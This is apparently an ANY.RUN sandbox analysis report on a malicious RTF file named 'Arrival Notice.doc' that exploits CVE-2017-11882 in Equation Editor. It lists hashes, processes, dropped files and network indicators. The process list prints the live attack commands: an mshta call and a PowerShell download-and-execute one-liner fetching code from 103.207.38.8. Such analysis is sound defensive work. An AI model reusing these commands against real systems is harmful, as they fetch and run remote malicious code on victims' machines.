analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Arrival Notice.doc

Full analysis: https://app.any.run/tasks/a9ec5b50-c9c9-4ab6-8235-13bf0495ae9c
Verdict: Malicious activity
Analysis date: October 09, 2019, 18:21:26
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
generated-doc
exploit
CVE-2017-11882
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

FEEAB7C41B73D8F03B3D4D005A8B8BF3

SHA1:

CB4DA77E47FBB97B9DAB5C42FE8FF42BB25953A5

SHA256:

1AE650453A47CBF7872860245C7FEFF1DC7F82E9AFC0AE9D431B66CA6F324ADE

SSDEEP:

768:qxrBqbeW6HHkXzD7p2ogaPPPPPhPPPPPgPPPPP/tpeyevzoR8oVojrc9YU:qqbUtwNpoWPcKU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 1504)
  • SUSPICIOUS

    • Executed via COM

      • EQNEDT32.EXE (PID: 1504)
    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EQNEDT32.EXE (PID: 1504)
    • Executed via WMI

      • powershell.exe (PID: 2760)
    • Creates files in the user directory

      • powershell.exe (PID: 2760)
    • PowerShell script executed

      • powershell.exe (PID: 2760)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3308)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3308)
    • Application was crashed

      • EQNEDT32.EXE (PID: 1504)
    • Reads internet explorer settings

      • MsHTa.exe (PID: 2804)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

InternalVersionNumber: 95
CharactersWithSpaces: -
Characters: -
Words: -
Pages: 1
TotalEditTime: -
RevisionNumber: 1
ModifyDate: 2019:10:07 21:04:00
CreateDate: 2019:10:07 21:04:00
LastModifiedBy: FireSecIT
Author: FireSecIT
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
4
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs eqnedt32.exe mshta.exe powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3308"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Arrival Notice.doc.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1504"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2804MsHTa http://103.207.38.8:1010/hta &AAAAAAAA CC:\Windows\system32\MsHTa.exe
EQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2760powershell -exec bypass -w 1 -c $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($V.downloadstring('http://103.207.38.8:1010/get'));C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 240
Read events
755
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
3
Unknown types
5

Dropped files

PID
Process
Filename
Type
3308WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRD40.tmp.cvr
MD5:
SHA256:
2760powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\88Y2DBMO5GE8OMDFEPDM.temp
MD5:
SHA256:
3308WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Arrival Notice.doc.rtf.LNKlnk
MD5:952D9D661210EDD1B57046B3085FF8D5
SHA256:E58A6E766EE81B6C64846697D8673DF9B5AF3086B56F0A3455996412D0A866CC
2760powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:57F2BEBD8AB4D14DFF05F8F1EE1B1091
SHA256:24089794FD7207234A86BFD7344771ABD7A0BC15DCEB1A256EF927F010B65B1F
3308WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:CAFBCA40DBBC9EB3D949C215B534662E
SHA256:276C57955C5115EDD0906944187597F1BA2D0B5499864C1BD142C70DCDF6766C
3308WINWORD.EXEC:\Users\admin\Desktop\~$rival Notice.doc.rtfpgc
MD5:D8CE6E874303AC0CA90E08D97B2DD563
SHA256:A67AF16B75D1B1B1D24E42F05309931C15C15DF687CF8977E5267749B65D99F2
2760powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF104e9f.TMPbinary
MD5:57F2BEBD8AB4D14DFF05F8F1EE1B1091
SHA256:24089794FD7207234A86BFD7344771ABD7A0BC15DCEB1A256EF927F010B65B1F
3308WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:5F3E61FAFB22029B0AE300476C8025C2
SHA256:DB24AED397B61694DF21BF16379BD07B166F88B55BD872447A63A31CFF9ABD7B
2804MsHTa.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\hta[1]html
MD5:B4E61A6248989A55E62A6911A7CA5629
SHA256:BB1EE67DAB0FE73EE50E0B70ECF2A3FFEFBBDDE87717D84249D601E35F8A477B
3308WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D3867553.wmfwmf
MD5:A53FF3B2B74B0493CD2DD5351BCB2760
SHA256:AC5F55A119B8894F347A6E85328D4A1E7BA350E0D4EA98CE1D3B2F95FAECB5F2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2760
powershell.exe
GET
103.207.38.8:1010
http://103.207.38.8:1010/get
VN
malicious
2804
MsHTa.exe
GET
200
103.207.38.8:1010
http://103.207.38.8:1010/hta
VN
html
2.44 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2804
MsHTa.exe
103.207.38.8:1010
VNPT Corp
VN
malicious
2760
powershell.exe
103.207.38.8:1010
VNPT Corp
VN
malicious

DNS requests

No data

Threats

PID
Process
Class
Message
2804
MsHTa.exe
Misc activity
SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
1 ETPRO signatures available at the full report
No debug info